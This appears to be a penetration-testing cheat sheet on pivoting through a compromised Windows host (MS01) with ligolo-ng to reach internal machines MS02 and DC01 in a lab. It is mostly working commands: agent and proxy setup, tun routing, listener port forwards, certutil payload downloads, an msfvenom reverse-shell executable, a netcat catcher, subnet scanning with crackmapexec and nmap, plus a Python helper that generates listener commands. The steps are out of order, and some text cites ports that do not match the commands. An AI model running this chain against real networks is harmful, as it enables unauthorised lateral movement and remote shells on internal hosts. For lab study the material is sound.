Pivot with Ligolo
Network
External network
Internal network
Local port forward
Step 1: Setup Proxy
Step 2: Run Agent
Step 3: Connect to Session
Step 4: Establish Routing
Step 5: Test Connection
Step 6: File Transfers to MS02 & DC01
Step 7: Reverse Shell on MS02 & DC01
Tip

This step can be performed early on if needed. You may not necessarily need localadmin before performing internal enumeration.

  • Assess the situation
  • Assess the environments
  • And proceed in logical order

Use -laddr to bind the proxy to a specific address and port if firewall restrictions apply (the agent must then connect to that port instead of the default 11601)

./proxy -laddr 0.0.0.0:443 -selfcert

Add interface to kali (use your own username)

sudo ip tuntap add user <username> mode tun ligolo

Enable interface

sudo ip link set ligolo up

Verify the ligolo interface is up

ifconfig (or: ip link show ligolo)

Start ligolo-ng proxy

./proxy -selfcert

ATTACKER - KALI

192.168.85.128

On the victim (MS01), run the agent and point it at the port the proxy listens on (11601 by default)

agent.exe -connect <IP-KALI>:11601 -retry -ignore-cert

Kali-side summary (proxy host):

sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 240.0.0.1/32 dev ligolo
./proxy -selfcert

240.0.0.1 is ligolo-ng's special address for reaching services bound only to the agent host's own loopback.

MS01

eth0: 192.168.85.136
eth1: 10.10.120.131

MS02

eth1: 10.10.120.130

DC01

eth1: 10.10.120.140

Remote (Linux agent binary)

Local port forward

./agent -connect <remote_ip>:11601 -retry -ignore-cert

On the target host (ms02 or dc01) download the required file(s)

certutil -urlcache -f http://10.10.120.131:8080/filename.exe shell.exe

IN THIS EXAMPLE:
If you want to download a file to MS02 you can use the usual commands, but:

  • You need to use the internal IP address (eth1) of MS01, because MS02 cannot reach Kali directly.
  • The web server is running on port 80 on Kali.

Within the Ligolo proxy session, set up a port forward from port 8888 on MS01 to your Kali machine listening on port 80 (bind to the jumphost's internal IP, not its external one). The port in --addr is the one the target connects to; the port in --to is the one your local service listens on.

listener_add --addr 10.10.120.131:8080 --to 127.0.0.1:80
listener_list

Start a web server on port 80

python3 -m http.server 80

On the target

On the proxy server (ligolo-ng), set up a port forward from 1234 to our machine listening on 4444.
Make sure to specify the internal IP of the jumphost in --addr; the target must be able to reach that address.

listener_add --addr 10.10.120.131:443 --to 127.0.0.1:443

Show listeners

listener_list

On another terminal, create a reverse shell payload. You can also use powercat or other methods

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.120.131 LPORT=443 -f exe -o rev.exe

Setup a listener on the port given in --to (443 here), since that is where the proxy relays the connection

nc -lvp 443

On the target host (ms02 or dc01), download the reverse shell through the file-transfer listener from Step 6 (the URL port must match that listener's --addr port)

certutil -urlcache -f http://10.10.120.131:8080/filename.exe shell.exe

Next, execute the reverse shell payload

.\rev.exe

IN THIS EXAMPLE:
If you want a reverse shell from MS02 or DC01 to your attacker machine:

  • You need to use the IP address on eth1 on MS01.
  • The reverse shell should connect to the first port declared in the add listener. In this example port 443.
  • The netcat listener should run on the second port specified. In this case 443
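
The two rules in this example (bind the listener to MS01's internal leg, and keep the --addr port for the target and the --to port for the local service) can be checked mechanically before typing anything into the proxy session. This is an added helper, not part of the original notes or of ligolo-ng; the interface data is constructed from the lab on this page and the function names are hypothetical.

```python
import ipaddress

# Constructed sample data mirroring the lab on this page: MS01 runs the
# Ligolo agent and has one leg on each network; MS02 and DC01 are internal.
MS01_IFACES = {
    "eth0": ipaddress.ip_interface("192.168.85.136/24"),  # external leg
    "eth1": ipaddress.ip_interface("10.10.120.131/24"),   # internal leg
}


def pick_jumphost_addr(ifaces, target_ip):
    """Return (iface, ip) of the jumphost leg that shares a subnet with target_ip.

    A listener must bind here: an internal host can only reach the jumphost on
    the subnet they share, never on the external leg.
    """
    target = ipaddress.ip_address(target_ip)
    for name, iface in ifaces.items():
        if target in iface.network:
            return name, str(iface.ip)
    raise ValueError(f"no jumphost interface shares a subnet with {target_ip}")


def plan_listener(ifaces, target_ip, jumphost_port, local_port):
    """Build the listener_add line for a reverse forward through the agent.

    jumphost_port is what the agent opens on the jumphost and what the target
    dials; local_port is what the service on the proxy host listens on. Mixing
    the two up is the usual reason a listener never receives a connection.
    """
    _, addr = pick_jumphost_addr(ifaces, target_ip)
    return {
        "listener_add": f"listener_add --addr {addr}:{jumphost_port} --to 127.0.0.1:{local_port}",
        "target_dials": f"{addr}:{jumphost_port}",
        "local_listener_port": local_port,
    }


def route_for_internal(ifaces, target_ip, dev="ligolo"):
    """Route the jumphost's internal subnet over the ligolo tun interface."""
    name, _ = pick_jumphost_addr(ifaces, target_ip)
    return f"sudo ip route add {ifaces[name].network} dev {dev}"


if __name__ == "__main__":
    print(route_for_internal(MS01_IFACES, "10.10.120.140"))
    for line in plan_listener(MS01_IFACES, "10.10.120.140", 443, 443).values():
        print(line)
```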

Now that everything is set up, test it. Ping the DC through the tunnel

ping 10.10.120.140

You can also use crackmapexec. We scan the whole subnet on the internal interface.

crackmapexec smb 10.10.120.0/24
nmap --top-ports=1000 -sT -Pn 10.10.120.130,10.10.120.140 --open

Open new terminal

sudo ip route add 10.10.120.0/24 dev ligolo

Check to see if the new route is added

ip route

On the ligolo session (from Step 1), enter session, select the session ID (1), then enter start

session
>> 1
>> ifconfig   (optional: shows the agent host's interfaces and subnets)
>> start      (alias: tunnel_start)